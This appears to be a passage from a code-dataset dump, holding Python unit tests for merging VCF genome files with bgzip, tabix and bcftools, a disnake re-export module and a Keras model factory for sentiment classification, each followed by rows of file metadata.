##ALT=<ID=CN113,Description="Copy number allele: 113 copies">
##ALT=<ID=CN114,Description="Copy number allele: 114 copies">
##ALT=<ID=CN115,Description="Copy number allele: 115 copies">
##ALT=<ID=CN116,Description="Copy number allele: 116 copies">
##ALT=<ID=CN117,Description="Copy number allele: 117 copies">
##ALT=<ID=CN118,Description="Copy number allele: 118 copies">
##ALT=<ID=CN119,Description="Copy number allele: 119 copies">
##ALT=<ID=CN120,Description="Copy number allele: 120 copies">
##ALT=<ID=CN121,Description="Copy number allele: 121 copies">
##ALT=<ID=CN122,Description="Copy number allele: 122 copies">
##ALT=<ID=CN123,Description="Copy number allele: 123 copies">
##ALT=<ID=CN124,Description="Copy number allele: 124 copies">
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">
##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">
##INFO=<ID=CS,Number=1,Type=String,Description="Source call set.">
##INFO=<ID=END,Number=1,Type=Integer,Description="End coordinate of this variant">
##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">
##INFO=<ID=MC,Number=.,Type=String,Description="Merged calls.">
##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END<POLARITY; If there is only 5' OR 3' support for this call, will be NULL NULL for START and END">
##INFO=<ID=MEND,Number=1,Type=Integer,Description="Mitochondrial end coordinate of inserted sequence">
##INFO=<ID=MLEN,Number=1,Type=Integer,Description="Estimated length of mitochondrial insert">
##INFO=<ID=MSTART,Number=1,Type=Integer,Description="Mitochondrial start coordinate of inserted sequence">
##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="SV length. It is only calculated for structural variation MEIs. For other types of SVs; one may calculate the SV length by INFO:END-START+1, or by finding the difference between lengthes of REF and ALT alleles">
##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">
##INFO=<ID=TSD,Number=1,Type=String,Description="Precise Target Site Duplication for bases, if unknown, value will be NULL">
##INFO=<ID=AC,Number=A,Type=Integer,Description="Total number of alternate alleles in called genotypes">
##INFO=<ID=AF,Number=A,Type=Float,Description="Estimated allele frequency in the range (0,1)">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=AN,Number=1,Type=Integer,Description="Total number of alleles in called genotypes">
##INFO=<ID=EAS_AF,Number=A,Type=Float,Description="Allele frequency in the EAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=EUR_AF,Number=A,Type=Float,Description="Allele frequency in the EUR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AFR_AF,Number=A,Type=Float,Description="Allele frequency in the AFR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AMR_AF,Number=A,Type=Float,Description="Allele frequency in the AMR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=SAS_AF,Number=A,Type=Float,Description="Allele frequency in the SAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=DP,Number=1,Type=Integer,Description="Total read depth; only low coverage data were counted towards the DP, exome data were not used">
##INFO=<ID=AA,Number=1,Type=String,Description="Ancestral Allele. Format: AA|REF|ALT|IndelType. AA: Ancestral allele, REF:Reference Allele, ALT:Alternate Allele, IndelType:Type of Indel (REF, ALT and IndelType are only defined for indels)">
##INFO=<ID=VT,Number=.,Type=String,Description="indicates what type of variant the line represents">
##INFO=<ID=EX_TARGET,Number=0,Type=Flag,Description="indicates whether a variant is within the exon pull down target boundaries">
##INFO=<ID=MULTI_ALLELIC,Number=0,Type=Flag,Description="indicates whether a site is multi-allelic">
##bcftools_viewVersion=1.6+htslib-1.6
##bcftools_viewCommand=view -c1 -Oz -s HG00097 -o G1000_chr1_10000_20000.HG00097.vcf.gz G1000_chr1_10000_20000.vcf.gz; Date=Mon Nov 6 15:48:23 2017
#CHROM POS ID REF ALT QUAL FILTER INFO FORMAT HG00097
1 10177 rs367896724 A AC 100 PASS AC=1;AF=0.425319;AN=2;NS=2504;DP=103152;EAS_AF=0.3363;AMR_AF=0.3602;AFR_AF=0.4909;EUR_AF=0.4056;SAS_AF=0.4949;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 0|1
1 10352 rs555500075 T TA 100 PASS AC=1;AF=0.4375;AN=2;NS=2504;DP=88915;EAS_AF=0.4306;AMR_AF=0.4107;AFR_AF=0.4788;EUR_AF=0.4264;SAS_AF=0.4192;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 1|0
1 10616 rs376342519 CCGCCGTTGCAAAGGCGCGCCG C 100 PASS AC=2;AF=0.993011;AN=2;NS=2504;DP=2365;EAS_AF=0.9911;AMR_AF=0.9957;AFR_AF=0.9894;EUR_AF=0.994;SAS_AF=0.9969;VT=INDEL GT 1|1
1 13110 rs540538026 G A 100 PASS AC=1;AF=0.0267572;AN=2;NS=2504;DP=23422;EAS_AF=0.002;AMR_AF=0.036;AFR_AF=0.0053;EUR_AF=0.0567;SAS_AF=0.044;AA=g|||;VT=SNP GT 1|0
1 13116 rs62635286 T G 100 PASS AC=1;AF=0.0970447;AN=2;NS=2504;DP=22340;EAS_AF=0.0248;AMR_AF=0.121;AFR_AF=0.0295;EUR_AF=0.1869;SAS_AF=0.1534;AA=t|||;VT=SNP GT 1|0
1 13118 rs200579949 A G 100 PASS AC=1;AF=0.0970447;AN=2;NS=2504;DP=21395;EAS_AF=0.0248;AMR_AF=0.121;AFR_AF=0.0295;EUR_AF=0.1869;SAS_AF=0.1534;AA=a|||;VT=SNP GT 1|0
1 14599 rs531646671 T A 100 PASS AC=1;AF=0.147564;AN=2;NS=2504;DP=32081;EAS_AF=0.0893;AMR_AF=0.1758;AFR_AF=0.121;EUR_AF=0.161;SAS_AF=0.2096;AA=t|||;VT=SNP GT 0|1
1 14604 rs541940975 A G 100 PASS AC=1;AF=0.147564;AN=2;NS=2504;DP=29231;EAS_AF=0.0893;AMR_AF=0.1758;AFR_AF=0.121;EUR_AF=0.161;SAS_AF=0.2096;AA=a|||;VT=SNP GT 0|1
1 14930 rs75454623 A G 100 PASS AC=1;AF=0.482228;AN=2;NS=2504;DP=42231;EAS_AF=0.4137;AMR_AF=0.5231;AFR_AF=0.4811;EUR_AF=0.5209;SAS_AF=0.4857;AA=a|||;VT=SNP GT 0|1
1 15211 rs78601809 T G 100 PASS AC=1;AF=0.609026;AN=2;NS=2504;DP=32245;EAS_AF=0.504;AMR_AF=0.6772;AFR_AF=0.5371;EUR_AF=0.7316;SAS_AF=0.6401;AA=t|||;VT=SNP GT 0|1
1 15274 rs62636497 A G,T 100 PASS AC=0,2;AF=0.347244,0.640974;AN=2;NS=2504;DP=23255;EAS_AF=0.4812,0.5188;AMR_AF=0.2752,0.7205;AFR_AF=0.323,0.6369;EUR_AF=0.2922,0.7078;SAS_AF=0.3497,0.6472;AA=g|||;VT=SNP;MULTI_ALLELIC GT 2|2
1 15820 rs2691315 G T 100 PASS AC=1;AF=0.410543;AN=2;NS=2504;DP=14933;EAS_AF=0.6052;AMR_AF=0.2939;AFR_AF=0.4849;EUR_AF=0.2714;SAS_AF=0.3354;AA=t|||;VT=SNP;EX_TARGET GT 0|1
1 15903 rs557514207 G GC 100 PASS AC=1;AF=0.441094;AN=2;NS=2504;DP=7012;EAS_AF=0.8681;AMR_AF=0.415;AFR_AF=0.0431;EUR_AF=0.4652;SAS_AF=0.5327;AA=ccc|CC|CCC|deletion;VT=INDEL;EX_TARGET GT 0|1
1 18849 rs533090414 C G 100 PASS AC=2;AF=0.951877;AN=2;NS=2504;DP=4700;EAS_AF=1;AMR_AF=0.9769;AFR_AF=0.8411;EUR_AF=0.9911;SAS_AF=0.9939;AA=g|||;VT=SNP GT 1|1
"""
@classmethod
def setUpClass(cls):
cls.test_file_dir, cls.test_bgzipped_fps = help_get_test_file_info()
# region _get_vcf_file_paths_list_in_directory tests
def test__get_vcf_file_paths_list_in_directory(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
temp_HG00097_vcf_file.close() # but DON'T delete yet
        # also write a NON-vcf file into this dir and ensure it ISN'T included in the returned list
temp_non_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=".txt", delete=False)
temp_non_vcf_file.write("test file".encode('ascii'))
temp_non_vcf_file.close() # but DON'T delete yet
expected_output = sorted([temp_HG00096_vcf_file.name, temp_HG00097_vcf_file.name])
real_output = ns_test._get_vcf_file_paths_list_in_directory(temp_dir.name, ns_test.VCF_EXTENSION)
self.assertListEqual(expected_output, real_output)
def test__get_vcf_file_paths_list_in_directory_none(self):
temp_dir = tempfile.TemporaryDirectory()
real_output = ns_test._get_vcf_file_paths_list_in_directory(temp_dir.name, ns_test.VCF_EXTENSION)
self.assertListEqual([], real_output)
# endregion
def test__build_merge_vcf_command_str(self):
input_vcf_fps_list = ["my/vcf_folder/vcf_file1.vcf", "my/vcf_folder/vcf_file2.vcf"]
expected_output = "bcftools merge my/vcf_folder/vcf_file1.vcf my/vcf_folder/vcf_file2.vcf"
real_output = ns_test._build_merge_vcf_command_str(input_vcf_fps_list)
self.assertEqual(expected_output, real_output)
def test__build_bgzip_vcf_command_str(self):
real_output = ns_test._build_bgzip_vcf_command_str("my/vcf_folder/vcf_file1.vcf")
self.assertEqual("bgzip -c my/vcf_folder/vcf_file1.vcf", real_output)
def test__build_index_vcf_command_str(self):
real_output = ns_test._build_index_vcf_command_str("my/vcf_folder/vcf_file1.vcf.gz")
self.assertEqual('tabix -p vcf my/vcf_folder/vcf_file1.vcf.gz', real_output)
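    # Taken together, the three builders above compose the standard
    # bgzip/tabix/bcftools pipeline (a sketch; the exact flags are pinned by
    # the assertions above):
    #   bgzip -c sample1.vcf > sample1.vcf.gz
    #   tabix -p vcf sample1.vcf.gz
    #   bcftools merge sample1.vcf.gz sample2.vcf.gz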
# region _bgzip_and_index_vcf tests
def test_bgzip_and_index_vcf_is_vcf_gz(self):
input_fp = expected_output = "my/vcf_folder/vcf_file1.vcf.gz"
real_output = ns_test.bgzip_and_index_vcf(input_fp)
self.assertEqual(expected_output, real_output)
def test_bgzip_and_index_vcf_not_vcf_gz(self):
        # NB: the output .vcf.gz and .vcf.gz.tbi files are placed in the same directory as the input file.
# To ensure they are cleaned up after the test is over, place everything in a temporary directory
temp_dir = tempfile.TemporaryDirectory()
temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
temp_HG00097_vcf_file.close() # but DON'T delete yet
expected_output = temp_HG00097_vcf_file.name + ".gz"
real_output = ns_test.bgzip_and_index_vcf(temp_HG00097_vcf_file.name)
# NB: I am not checking the *contents* of these files; they are created by subprocess calls to outside programs
# and I am going to trust that those outside programs do their jobs as advertised.
self.assertTrue(os.path.isfile(temp_HG00097_vcf_file.name + ".gz"))
self.assertTrue(os.path.isfile(temp_HG00097_vcf_file.name + ".gz.tbi"))
self.assertEqual(expected_output, real_output)
# endregion
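    # NB: bgzip matters here because it produces BGZF (block gzip) output:
    # tabix can only index BGZF-compressed, coordinate-sorted files, and
    # bcftools merge in turn requires such indexed inputs.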
def test__merge_bgzipped_indexed_vcfs(self):
# NB: This method works on *already-bgzipped-and-indexed* vcf files, which is why I'm depending on
# pre-provided test files rather than making my own temporary test files.
# put the output file in a temporary directory so it will be automatically cleaned up when test finishes
temp_dir = tempfile.TemporaryDirectory()
        output_vcf_fp = os.path.join(temp_dir.name, "temp.vcf.gz")
ns_test._merge_bgzipped_indexed_vcfs(self.test_bgzipped_fps, output_vcf_fp)
        # NB: Again, I am not checking the *contents* of this file; it is created by a subprocess call to an
        # outside program, and I am going to trust that the outside program does its job as advertised.
self.assertTrue(os.path.isfile(output_vcf_fp))
self.assertTrue(os.stat(output_vcf_fp).st_size > 0) # file size > 0

    # region merge_vcfs tests
    def test_merge_vcfs_multiple_by_dir_not_bgzipped(self):
        temp_dir = tempfile.TemporaryDirectory()
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
        temp_HG00097_vcf_file.close()  # but DON'T delete yet
        expected_output_vcf_fp = os.path.join(temp_dir.name, "tempy.vcf")
        real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy")
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        with open(real_output_vcf_fp, 'r') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096', 'HG00097'], sorted(sample_names_list))

    def test_merge_vcfs_multiple_by_dir_bgzipped(self):
        # NB: This method works on *already-bgzipped-and-indexed* vcf files, which is why I'm depending on
        # pre-provided test files rather than making my own temporary test files.
        # Put the output file in a temporary directory so it will be automatically cleaned up when the test finishes.
        temp_dir = tempfile.TemporaryDirectory()
        expected_output_vcf_fp = os.path.join(temp_dir.name, "tempy.vcf")
        real_output_vcf_fp = ns_test.merge_vcfs(self.test_file_dir, temp_dir.name, "tempy", vcfs_gzipped=True)
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        # NB: Again, I am not checking the *contents* of this file; it is created by a subprocess call to an outside
        # program and I am going to trust that that outside program does its job as advertised.
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        self.assertTrue(os.stat(real_output_vcf_fp).st_size > 0)  # file size > 0
        with open(real_output_vcf_fp, 'r') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096', 'HG00097'], sorted(sample_names_list))

    def test_merge_vcfs_multiple_by_list(self):
        temp_dir = tempfile.TemporaryDirectory()
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
        temp_HG00097_vcf_file.close()  # but DON'T delete yet
        expected_output_vcf_fp = os.path.join(temp_dir.name, "tempy.vcf")
        # NB: it doesn't matter what value is passed for vcfs_gzipped, as it isn't used when a list is passed
        real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy",
                                                [temp_HG00096_vcf_file.name, temp_HG00097_vcf_file.name])
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        with open(real_output_vcf_fp, 'r') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096', 'HG00097'], sorted(sample_names_list))
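
    # NB: the "single" tests below exercise merge_vcfs' one-input shortcut: with a single vcf there
    # is nothing to merge, so the file is simply copied to (or, in the "no_copy_needed" case, found
    # already at) the expected output path.
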
    def test_merge_vcfs_single_by_dir(self):
        temp_dir = tempfile.TemporaryDirectory()
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        expected_output_vcf_fp = os.path.join(temp_dir.name, os.path.basename(temp_HG00096_vcf_file.name))
        # NB: it doesn't matter what value is passed for vcfs_gzipped, as it isn't used when there is just one file
        real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy")
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        with open(real_output_vcf_fp, 'r') as file_handle:
            real_output_contents = file_handle.read()
        self.assertEqual(self.HG00096_VCF_CONTENTS, real_output_contents)
        with open(real_output_vcf_fp, 'r') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096'], sorted(sample_names_list))

    def test_merge_vcfs_single_by_list(self):
        temp_dir = tempfile.TemporaryDirectory()
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        expected_output_vcf_fp = os.path.join(temp_dir.name, os.path.basename(temp_HG00096_vcf_file.name))
        # NB: it doesn't matter what value is passed for vcfs_gzipped, as it isn't used when a list is passed
        real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", [temp_HG00096_vcf_file.name])
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        with open(real_output_vcf_fp, 'r') as file_handle:
            real_output_contents = file_handle.read()
        self.assertEqual(self.HG00096_VCF_CONTENTS, real_output_contents)
        with open(real_output_vcf_fp, 'r') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096'], sorted(sample_names_list))

    def test_merge_vcfs_single_already_bgzipped(self):
        # NB: This method works on *already-bgzipped-and-indexed* vcf files, which is why I'm depending on
        # pre-provided test files rather than making my own temporary test files.
        # Put the output file in a temporary directory so it will be automatically cleaned up when the test finishes.
        temp_dir = tempfile.TemporaryDirectory()
        expected_output_vcf_fp = os.path.join(temp_dir.name, os.path.basename(self.test_bgzipped_fps[0]))
        # NB: it doesn't matter what value is passed for vcfs_gzipped, as it isn't used when a list is passed
        real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", [self.test_bgzipped_fps[0]])
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        # NB: open with 'rb', not 'r', as this is a binary file
        with open(real_output_vcf_fp, 'rb') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096'], sorted(sample_names_list))

    def test_merge_vcfs_single_no_copy_needed(self):
        temp_dir = tempfile.TemporaryDirectory()
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        temp_HG00096_vcf_base = os.path.splitext(os.path.basename(temp_HG00096_vcf_file.name))[0]
        expected_output_vcf_fp = os.path.join(temp_dir.name, temp_HG00096_vcf_base + ns_test.VCF_EXTENSION)
        # NB: it doesn't matter what value is passed for vcfs_gzipped, as it isn't used when a list is passed
        real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, temp_HG00096_vcf_base,
                                                [temp_HG00096_vcf_file.name])
        self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
        self.assertTrue(os.path.isfile(real_output_vcf_fp))
        with open(real_output_vcf_fp, 'r') as f:
            sample_names_list = vcf.Reader(f).samples
        self.assertListEqual(['HG00096'], sorted(sample_names_list))
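
    # NB: the remaining tests check the failure mode: merge_vcfs should raise ValueError when no
    # input files with the expected extension can be found, whether it is scanning a directory or
    # handed an empty list.
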
    def test_merge_vcfs_by_dir_error_no_files_found_not_bgzipped(self):
        temp_dir = tempfile.TemporaryDirectory()
        # NB: This file is NOT REALLY BGZIPPED--but for this test all I need is a file with the bgzipped *extension* :)
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.BGZIPPED_VCF_EXTENSION,
                                                            delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        # there is a file in the directory, but it doesn't have the desired extension
        with self.assertRaises(ValueError):
            ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy")

    def test_merge_vcfs_by_dir_error_no_files_found_bgzipped(self):
        temp_dir = tempfile.TemporaryDirectory()
        temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
        temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
        temp_HG00096_vcf_file.close()  # but DON'T delete yet
        # there is a file in the directory, but it doesn't have the desired extension
        with self.assertRaises(ValueError):
            ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", vcfs_gzipped=True)

    def test_merge_vcfs_by_list_error_no_files_found(self):
        # create a new, empty directory with no vcfs in it
        temp_dir = tempfile.TemporaryDirectory()
        with self.assertRaises(ValueError):
            ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy", [])
    # endregion
| 63.026764 | 263 | 0.745097 | 8,347 | 51,808 | 4.513118 | 0.10998 | 0.035306 | 0.140479 | 0.179183 | 0.956253 | 0.947997 | 0.93714 | 0.929123 | 0.92469 | 0.911338 | 0 | 0.120497 | 0.101509 | 51,808 | 821 | 264 | 63.103532 | 0.68878 | 0.060087 | 0 | 0.869565 | 0 | 0.112202 | 0.759483 | 0.504615 | 0 | 0 | 0 | 0 | 0.053296 | 1 | 0.02805 | false | 0.036466 | 0.007013 | 0 | 0.040673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
6df69d67b78e98c92ddf663e148e02d01a098ac1 | 148 | py | Python | discord/ext/commands/_types.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/ext/commands/_types.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/ext/commands/_types.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | from disnake.ext.commands._types import *
from disnake.ext.commands._types import __dict__ as __original_dict__
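# NB: "import *" skips names with a leading underscore, so the module's full __dict__ is copied in
# as well; this file just re-exports disnake's private _types module under the discord.ext namespace.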
locals().update(__original_dict__)
| 29.6 | 69 | 0.837838 | 20 | 148 | 5.4 | 0.55 | 0.203704 | 0.259259 | 0.407407 | 0.611111 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 148 | 4 | 70 | 37 | 0.794118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0968828e29d25c34f50c72a4535d48959b3d4d1c | 129 | py | Python | todo/todos/serializers/__init__.py | hadipirhadi/scalors-assignment-backend | 93d28b9be23375eeb27eaa17663bd86e06318000 | [
"MIT"
] | null | null | null | todo/todos/serializers/__init__.py | hadipirhadi/scalors-assignment-backend | 93d28b9be23375eeb27eaa17663bd86e06318000 | [
"MIT"
] | null | null | null | todo/todos/serializers/__init__.py | hadipirhadi/scalors-assignment-backend | 93d28b9be23375eeb27eaa17663bd86e06318000 | [
"MIT"
] | null | null | null | from .board_serializer import *
from .todo_serializer import *
from .user_serializer import *
from .reminder_serializer import *
| 25.8 | 34 | 0.813953 | 16 | 129 | 6.3125 | 0.4375 | 0.633663 | 0.594059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124031 | 129 | 4 | 35 | 32.25 | 0.893805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
110c2edb6ad4d6eb5d5521e82f2307435978aa53 | 2,535 | py | Python | model_factory.py | CarlFredriksson/sentiment_classification | ca7f23ec1e153d0cec19923082de6614767a4931 | [
"MIT"
] | null | null | null | model_factory.py | CarlFredriksson/sentiment_classification | ca7f23ec1e153d0cec19923082de6614767a4931 | [
"MIT"
] | null | null | null | model_factory.py | CarlFredriksson/sentiment_classification | ca7f23ec1e153d0cec19923082de6614767a4931 | [
"MIT"
] | null | null | null | from keras.models import Sequential, Input, Model
from keras.layers import Dense, Flatten, Embedding, Average, Activation, Lambda, Dropout, LSTM, Bidirectional
from keras.initializers import Constant
import numpy as np
import keras.backend as K
from keras import regularizers

def create_baseline_model(embedding_matrix, input_len):
    model = Sequential()
    model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1],
                        embeddings_initializer=Constant(embedding_matrix), input_length=input_len,
                        trainable=False, mask_zero=True))
    model.add(Lambda(lambda x: K.mean(x, axis=1)))
    model.add(Dense(1, activation="sigmoid"))
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model
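
# NB: a minimal usage sketch (hypothetical variable names; assumes an embedding matrix and padded
# integer sequences of length input_len have already been built):
#     model = create_baseline_model(embedding_matrix, input_len=200)
#     model.fit(x_train, y_train, validation_data=(x_val, y_val), epochs=5, batch_size=32)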

def create_rnn_model(embedding_matrix, input_len):
    model = Sequential()
    model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1],
                        embeddings_initializer=Constant(embedding_matrix), input_length=input_len,
                        trainable=False, mask_zero=True))
    model.add(LSTM(64, return_sequences=True, recurrent_dropout=0.5))
    model.add(Dropout(0.5))
    model.add(LSTM(64))
    model.add(Dense(64, activation="relu"))
    model.add(Dense(1, activation="sigmoid"))
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model


def create_bidir_rnn_model(embedding_matrix, input_len):
    model = Sequential()
    model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1],
                        embeddings_initializer=Constant(embedding_matrix), input_length=input_len,
                        trainable=False, mask_zero=True))
    model.add(Bidirectional(LSTM(64, return_sequences=True, recurrent_dropout=0.5)))
    model.add(Bidirectional(LSTM(64)))
    model.add(Dropout(0.5))
    model.add(Dense(64, activation="relu"))
    model.add(Dense(1, activation="sigmoid"))
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model


def create_train_emb_rnn_model(embedding_matrix, input_len):
    model = Sequential()
    model.add(Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1], input_length=input_len, mask_zero=True))
    model.add(LSTM(64, return_sequences=True, recurrent_dropout=0.5))
    model.add(Dropout(0.5))
    model.add(LSTM(64))
    model.add(Dropout(0.5))
    model.add(Dense(64, activation="relu"))
    model.add(Dense(1, activation="sigmoid"))
    model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
    return model | 46.944444 | 118 | 0.741223 | 337 | 2,535 | 5.412463 | 0.189911 | 0.096491 | 0.087719 | 0.053728 | 0.834978 | 0.820724 | 0.820724 | 0.820724 | 0.820724 | 0.820724 | 0 | 0.020325 | 0.126627 | 2,535 | 54 | 119 | 46.944444 | 0.803523 | 0 | 0 | 0.72 | 0 | 0 | 0.064669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.12 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
1116c8052e9edaa2d49ecc9d6aeba3214818ff94 | 16,194 | py | Python | koku/reporting/migrations/0213_delete_mat_views.py | bsquizz/koku | 386dd6ca4a4fd1b50790a929acc81d2dc245a91c | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0213_delete_mat_views.py | bsquizz/koku | 386dd6ca4a4fd1b50790a929acc81d2dc245a91c | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0213_delete_mat_views.py | bsquizz/koku | 386dd6ca4a4fd1b50790a929acc81d2dc245a91c | [
"Apache-2.0"
